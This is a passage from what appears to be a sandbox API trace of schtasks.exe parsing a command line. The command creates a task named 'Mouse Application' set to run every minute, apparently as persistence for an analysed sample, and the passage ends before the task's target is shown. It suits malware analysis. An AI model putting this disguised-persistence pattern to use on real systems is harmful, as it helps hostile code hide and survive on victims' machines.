pBlock=0x330f138, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xd2f68c, puLen=0xd2f688 | out: lplpBuffer=0xd2f68c*=0x330f310, puLen=0xd2f688) returned 1 [0113.327] lstrlenW (lpString="schtasks.exe") returned 12 [0113.327] lstrlenW (lpString="schtasks.exe") returned 12 [0113.327] lstrlenW (lpString=".EXE") returned 4 [0113.327] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0113.327] lstrlenW (lpString="schtasks.exe") returned 12 [0113.327] lstrlenW (lpString=".EXE") returned 4 [0113.327] _memicmp (_Buf1=0x3307de0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.327] lstrlenW (lpString="schtasks") returned 8 [0113.327] GetProcessHeap () returned 0x3300000 [0113.327] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cf30 [0113.327] GetProcessHeap () returned 0x3300000 [0113.327] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cf50 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cf70 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d110 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307cd8 [0113.328] _memicmp (_Buf1=0x3307cd8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xa0) returned 0x33004a0 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d130 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d190 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cff0 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fbd0 [0113.328] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x200) returned 0x330fde0 [0113.328] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0113.328] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0113.328] GetProcessHeap () returned 0x3300000 [0113.328] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x30) returned 0x3304960 [0113.328] _vsnwprintf (in: _Buffer=0x33004a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xd2f664 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0113.329] GetProcessHeap () returned 0x3300000 [0113.329] GetProcessHeap () returned 0x3300000 [0113.329] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330f138) returned 1 [0113.329] GetProcessHeap () returned 0x3300000 [0113.329] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330f138) returned 0x766 [0113.329] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330f138) returned 1 [0113.329] RtlRestoreLastWin32Error () returned 0x3163000 [0113.329] GetThreadLocale () returned 0x409 [0113.329] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.329] lstrlenW (lpString="?") returned 1 [0113.329] GetThreadLocale () returned 0x409 [0113.329] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.329] lstrlenW (lpString="create") returned 6 [0113.329] GetThreadLocale () returned 0x409 [0113.329] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.329] lstrlenW (lpString="delete") returned 6 [0113.329] GetThreadLocale () returned 0x409 [0113.329] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.329] lstrlenW (lpString="query") returned 5 [0113.329] GetThreadLocale () returned 0x409 [0113.329] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.329] lstrlenW (lpString="change") returned 6 [0113.330] GetThreadLocale () returned 0x409 [0113.330] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.330] lstrlenW (lpString="run") returned 3 [0113.330] GetThreadLocale () returned 0x409 [0113.330] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.330] lstrlenW (lpString="end") returned 3 [0113.330] GetThreadLocale () returned 0x409 [0113.330] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.330] lstrlenW (lpString="showsid") returned 7 [0113.330] GetThreadLocale () returned 0x409 [0113.330] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.330] RtlRestoreLastWin32Error () returned 0x3163000 [0113.330] RtlRestoreLastWin32Error () returned 0x3163000 [0113.330] lstrlenW (lpString="/Create") returned 7 [0113.330] lstrlenW (lpString="-/") returned 2 [0113.330] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.330] lstrlenW (lpString="?") returned 1 [0113.330] lstrlenW (lpString="?") returned 1 [0113.330] GetProcessHeap () returned 0x3300000 [0113.330] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fac8 [0113.330] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.330] GetProcessHeap () returned 0x3300000 [0113.330] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xa) returned 0x330fb40 [0113.330] lstrlenW (lpString="Create") returned 6 [0113.330] GetProcessHeap () returned 0x3300000 [0113.330] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fbe8 [0113.330] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.330] GetProcessHeap () returned 0x3300000 [0113.330] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d1b0 [0113.331] _vsnwprintf (in: _Buffer=0x330fb40, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|?|") returned 3 [0113.331] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|Create|") returned 8 [0113.331] lstrlenW (lpString="|?|") returned 3 [0113.331] lstrlenW (lpString="|Create|") returned 8 [0113.331] RtlRestoreLastWin32Error () returned 0x3163000 [0113.331] lstrlenW (lpString="create") returned 6 [0113.331] lstrlenW (lpString="create") returned 6 [0113.331] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.331] GetProcessHeap () returned 0x3300000 [0113.331] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fb40) returned 1 [0113.331] GetProcessHeap () returned 0x3300000 [0113.331] RtlReAllocateHeap (Heap=0x3300000, Flags=0xc, Ptr=0x330fb40, Size=0x14) returned 0x330d1d0 [0113.331] lstrlenW (lpString="Create") returned 6 [0113.331] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.331] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|create|") returned 8 [0113.331] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|Create|") returned 8 [0113.331] lstrlenW (lpString="|create|") returned 8 [0113.331] lstrlenW (lpString="|Create|") returned 8 [0113.331] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0113.331] RtlRestoreLastWin32Error () returned 0x3163000 [0113.331] RtlRestoreLastWin32Error () returned 0x3163000 [0113.331] RtlRestoreLastWin32Error () returned 0x3163000 [0113.331] lstrlenW (lpString="/SC") returned 3 [0113.331] lstrlenW (lpString="-/") returned 2 [0113.331] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.331] lstrlenW (lpString="?") returned 1 [0113.331] lstrlenW (lpString="?") returned 1 [0113.332] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.332] lstrlenW (lpString="SC") returned 2 [0113.332] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.332] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|?|") returned 3 [0113.332] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.332] lstrlenW (lpString="|?|") returned 3 [0113.332] lstrlenW (lpString="|SC|") returned 4 [0113.332] RtlRestoreLastWin32Error () returned 0x3163000 [0113.332] lstrlenW (lpString="create") returned 6 [0113.332] lstrlenW (lpString="create") returned 6 [0113.332] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.332] lstrlenW (lpString="SC") returned 2 [0113.332] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.332] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|create|") returned 8 [0113.332] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.332] lstrlenW (lpString="|create|") returned 8 [0113.332] lstrlenW (lpString="|SC|") returned 4 [0113.332] StrStrIW (lpFirst="|create|", lpSrch="|SC|") returned 0x0 [0113.332] RtlRestoreLastWin32Error () returned 0x3163000 [0113.332] lstrlenW (lpString="delete") returned 6 [0113.332] lstrlenW (lpString="delete") returned 6 [0113.332] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.332] lstrlenW (lpString="SC") returned 2 [0113.332] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.332] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|delete|") returned 8 [0113.333] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.333] lstrlenW (lpString="|delete|") returned 8 [0113.333] lstrlenW (lpString="|SC|") returned 4 [0113.333] StrStrIW (lpFirst="|delete|", lpSrch="|SC|") returned 0x0 [0113.333] RtlRestoreLastWin32Error () returned 0x3163000 [0113.333] lstrlenW (lpString="query") returned 5 [0113.333] lstrlenW (lpString="query") returned 5 [0113.333] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.333] lstrlenW (lpString="SC") returned 2 [0113.333] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.333] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|query|") returned 7 [0113.333] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.333] lstrlenW (lpString="|query|") returned 7 [0113.333] lstrlenW (lpString="|SC|") returned 4 [0113.333] StrStrIW (lpFirst="|query|", lpSrch="|SC|") returned 0x0 [0113.333] RtlRestoreLastWin32Error () returned 0x3163000 [0113.333] lstrlenW (lpString="change") returned 6 [0113.333] lstrlenW (lpString="change") returned 6 [0113.333] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.333] lstrlenW (lpString="SC") returned 2 [0113.333] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.333] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|change|") returned 8 [0113.333] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.333] lstrlenW (lpString="|change|") returned 8 [0113.333] lstrlenW (lpString="|SC|") returned 4 [0113.333] StrStrIW (lpFirst="|change|", lpSrch="|SC|") returned 0x0 [0113.333] RtlRestoreLastWin32Error () returned 0x3163000 [0113.334] lstrlenW (lpString="run") returned 3 [0113.334] lstrlenW (lpString="run") returned 3 [0113.334] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.334] lstrlenW (lpString="SC") returned 2 [0113.334] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.334] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|run|") returned 5 [0113.334] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.334] lstrlenW (lpString="|run|") returned 5 [0113.334] lstrlenW (lpString="|SC|") returned 4 [0113.334] StrStrIW (lpFirst="|run|", lpSrch="|SC|") returned 0x0 [0113.334] RtlRestoreLastWin32Error () returned 0x3163000 [0113.334] lstrlenW (lpString="end") returned 3 [0113.334] lstrlenW (lpString="end") returned 3 [0113.334] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.334] lstrlenW (lpString="SC") returned 2 [0113.334] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.334] _vsnwprintf (in: _Buffer=0x330d1d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|end|") returned 5 [0113.334] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.334] lstrlenW (lpString="|end|") returned 5 [0113.334] lstrlenW (lpString="|SC|") returned 4 [0113.334] StrStrIW (lpFirst="|end|", lpSrch="|SC|") returned 0x0 [0113.334] RtlRestoreLastWin32Error () returned 0x3163000 [0113.334] lstrlenW (lpString="showsid") returned 7 [0113.334] lstrlenW (lpString="showsid") returned 7 [0113.334] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.334] GetProcessHeap () returned 0x3300000 [0113.334] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d1d0) returned 1 [0113.334] GetProcessHeap () returned 0x3300000 [0113.335] RtlReAllocateHeap (Heap=0x3300000, Flags=0xc, Ptr=0x330d1d0, Size=0x16) returned 0x330d150 [0113.335] lstrlenW (lpString="SC") returned 2 [0113.335] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.335] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0xa, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|showsid|") returned 9 [0113.335] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|SC|") returned 4 [0113.335] lstrlenW (lpString="|showsid|") returned 9 [0113.335] lstrlenW (lpString="|SC|") returned 4 [0113.335] StrStrIW (lpFirst="|showsid|", lpSrch="|SC|") returned 0x0 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] lstrlenW (lpString="/SC") returned 3 [0113.335] StrChrIW (lpStart="/SC", wMatch=0x3a) returned 0x0 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] lstrlenW (lpString="/SC") returned 3 [0113.335] GetProcessHeap () returned 0x3300000 [0113.335] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x8) returned 0x330bb68 [0113.335] GetProcessHeap () returned 0x3300000 [0113.335] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d1d0 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] lstrlenW (lpString="MINUTE") returned 6 [0113.335] lstrlenW (lpString="-/") returned 2 [0113.335] StrChrIW (lpStart="-/", wMatch=0x32f004d) returned 0x0 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] RtlRestoreLastWin32Error () returned 0x3163000 [0113.335] lstrlenW (lpString="MINUTE") returned 6 [0113.335] StrChrIW (lpStart="MINUTE", wMatch=0x3a) returned 0x0 [0113.336] RtlRestoreLastWin32Error () returned 0x3163000 [0113.336] RtlRestoreLastWin32Error () returned 0x3163000 [0113.336] lstrlenW (lpString="MINUTE") returned 6 [0113.336] GetProcessHeap () returned 0x3300000 [0113.336] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xe) returned 0x330fb58 [0113.336] GetProcessHeap () returned 0x3300000 [0113.336] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d010 [0113.336] RtlRestoreLastWin32Error () returned 0x3163000 [0113.336] RtlRestoreLastWin32Error () returned 0x3163000 [0113.336] lstrlenW (lpString="/TN") returned 3 [0113.336] lstrlenW (lpString="-/") returned 2 [0113.336] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.336] lstrlenW (lpString="?") returned 1 [0113.336] lstrlenW (lpString="?") returned 1 [0113.336] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.336] lstrlenW (lpString="TN") returned 2 [0113.336] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.336] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|?|") returned 3 [0113.336] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.336] lstrlenW (lpString="|?|") returned 3 [0113.336] lstrlenW (lpString="|TN|") returned 4 [0113.336] RtlRestoreLastWin32Error () returned 0x3163000 [0113.336] lstrlenW (lpString="create") returned 6 [0113.336] lstrlenW (lpString="create") returned 6 [0113.336] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.336] lstrlenW (lpString="TN") returned 2 [0113.336] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.337] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|create|") returned 8 [0113.337] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.337] lstrlenW (lpString="|create|") returned 8 [0113.337] lstrlenW (lpString="|TN|") returned 4 [0113.337] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0113.337] RtlRestoreLastWin32Error () returned 0x3163000 [0113.337] lstrlenW (lpString="delete") returned 6 [0113.337] lstrlenW (lpString="delete") returned 6 [0113.337] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.337] lstrlenW (lpString="TN") returned 2 [0113.337] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.337] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|delete|") returned 8 [0113.337] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.337] lstrlenW (lpString="|delete|") returned 8 [0113.337] lstrlenW (lpString="|TN|") returned 4 [0113.337] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0113.337] RtlRestoreLastWin32Error () returned 0x3163000 [0113.337] lstrlenW (lpString="query") returned 5 [0113.337] lstrlenW (lpString="query") returned 5 [0113.337] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.337] lstrlenW (lpString="TN") returned 2 [0113.337] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.337] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x8, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|query|") returned 7 [0113.337] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.337] lstrlenW (lpString="|query|") returned 7 [0113.337] lstrlenW (lpString="|TN|") returned 4 [0113.337] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0113.337] RtlRestoreLastWin32Error () returned 0x3163000 [0113.337] lstrlenW (lpString="change") returned 6 [0113.337] lstrlenW (lpString="change") returned 6 [0113.337] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.338] lstrlenW (lpString="TN") returned 2 [0113.338] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.338] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|change|") returned 8 [0113.338] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.338] lstrlenW (lpString="|change|") returned 8 [0113.338] lstrlenW (lpString="|TN|") returned 4 [0113.338] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0113.338] RtlRestoreLastWin32Error () returned 0x3163000 [0113.338] lstrlenW (lpString="run") returned 3 [0113.338] lstrlenW (lpString="run") returned 3 [0113.338] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.338] lstrlenW (lpString="TN") returned 2 [0113.338] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.338] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|run|") returned 5 [0113.338] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.338] lstrlenW (lpString="|run|") returned 5 [0113.338] lstrlenW (lpString="|TN|") returned 4 [0113.338] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0113.338] RtlRestoreLastWin32Error () returned 0x3163000 [0113.338] lstrlenW (lpString="end") returned 3 [0113.338] lstrlenW (lpString="end") returned 3 [0113.338] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.338] lstrlenW (lpString="TN") returned 2 [0113.338] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.338] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x6, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|end|") returned 5 [0113.338] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.338] lstrlenW (lpString="|end|") returned 5 [0113.338] lstrlenW (lpString="|TN|") returned 4 [0113.338] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0113.338] RtlRestoreLastWin32Error () returned 0x3163000 [0113.338] lstrlenW (lpString="showsid") returned 7 [0113.338] lstrlenW (lpString="showsid") returned 7 [0113.339] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.339] lstrlenW (lpString="TN") returned 2 [0113.339] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.339] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0xa, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|showsid|") returned 9 [0113.339] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TN|") returned 4 [0113.339] lstrlenW (lpString="|showsid|") returned 9 [0113.339] lstrlenW (lpString="|TN|") returned 4 [0113.339] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] lstrlenW (lpString="/TN") returned 3 [0113.339] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] lstrlenW (lpString="/TN") returned 3 [0113.339] GetProcessHeap () returned 0x3300000 [0113.339] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x8) returned 0x330bb88 [0113.339] GetProcessHeap () returned 0x3300000 [0113.339] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d1f0 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] lstrlenW (lpString="Mouse Application") returned 17 [0113.339] lstrlenW (lpString="-/") returned 2 [0113.339] StrChrIW (lpStart="-/", wMatch=0x32f004d) returned 0x0 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] lstrlenW (lpString="Mouse Application") returned 17 [0113.339] StrChrIW (lpStart="Mouse Application", wMatch=0x3a) returned 0x0 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] RtlRestoreLastWin32Error () returned 0x3163000 [0113.339] lstrlenW (lpString="Mouse Application") returned 17 [0113.339] GetProcessHeap () returned 0x3300000 [0113.339] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x24) returned 0x33046d8 [0113.339] GetProcessHeap () returned 0x3300000 [0113.339] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d210 [0113.340] RtlRestoreLastWin32Error () returned 0x3163000 [0113.340] RtlRestoreLastWin32Error () returned 0x3163000 [0113.340] lstrlenW (lpString="/TR") returned 3 [0113.340] lstrlenW (lpString="-/") returned 2 [0113.340] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.340] lstrlenW (lpString="?") returned 1 [0113.340] lstrlenW (lpString="?") returned 1 [0113.340] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.340] lstrlenW (lpString="TR") returned 2 [0113.340] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.340] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|?|") returned 3 [0113.340] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2f650 | out: _Buffer="|TR|") returned 4 [0113.340] lstrlenW (lpString="|?|") returned 3 [0113.340] lstrlenW (lpString="|TR|") returned 4 [0113.340] RtlRestoreLastWin32Error () returned 0x3163000 [0113.340] lstrlenW (lpString="create") returned 6 [0113.340] lstrlenW (lpString="create") returned 6 [0113.340] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.340] lstrlenW (lpString="TR") returned 2 [0113.340] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.340] 